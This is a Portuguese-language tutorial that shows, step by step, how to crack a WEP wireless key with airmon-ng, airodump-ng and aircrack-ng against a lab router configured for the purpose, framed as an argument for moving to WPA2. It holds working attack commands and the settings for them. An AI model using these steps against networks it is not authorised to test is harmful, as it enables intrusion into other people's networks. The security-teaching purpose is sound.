Revelando a Chave WEP

Marcos Henrique

0 min

Revelar a chave WEP de um roteador Wireless é uma atividade simples de ser realizada, sabemos que há inúmeros roteadores de muitas empresas/residências com esta configuração, nosso papel como profissionais de segurança da informação é orientar para que seja realizada a alteração desta configuração para uma solução mais segura como WPA2 por exemplo.

Segue abaixo o passo a passo de como relevar uma chave WEP.

01 — Passo

Configurando o roteador Wireless.

Name (SSID): 100SECURITY
Channel: 6
Security: WEP (Wired Equivalent Privacy)
Passphrase: 123456
Key 1: AA8465E6A4

02 — Passo

Verificação da Interface wlan1.

ifconfig wlan1

03 — Passo

Listando todas as redes disponíveis.

iwlist scan

Resultado do Scan:

NMAC Address: 00:1F:33:22:5B:50
Channel: 6
ESSID:”100SECURITY”

04 — Passo

Iniciando o Modo Monitor do airmon-ng sobre a Interface wlan1.

airmon-ng start wlan1

Modo Monitor iniciado:

Observe que Modo Monitor da interface wlan1 foi habilitado para a interface mon0.

mon0 — Interface de rede que funciona de modo promíscuo.

05 — Passo

Utilizando o airodump-ng para capturar os dados.

airodump-ng –-ivs -w senha -c 6 mon0

airodump-ng : Programa utilizado para fazer o Dump dos pacotes.
–-ivs : Vetor de Inicialização.
-w : Define o prefixo do arquivo .ivs que será gerado ex.: ( senha-01.ivs ).
-c : Canal da Rede ex.: ( 6 ).
mon0 : Interface de rede que funciona de modo promíscuo.

06 — Passo

Monitorando a captura de dados.

Quando a coluna #Data ultrapassar 20.000 já se considera possível a quebra completa da chave.

No ex.: 21058 IVs foram capturados.

07 — Passo

Revelando a Chave WEP.

aircrack-ng -a 1 senha-01.ivs

aircrack-ng : Programa utilizado para quebra a senha dos IVs capturados
–a : Define o modo de ataque.
1 : Modo de ataque WEP.
senha-01.ivs : Arquivo gerado dos IVs capturados.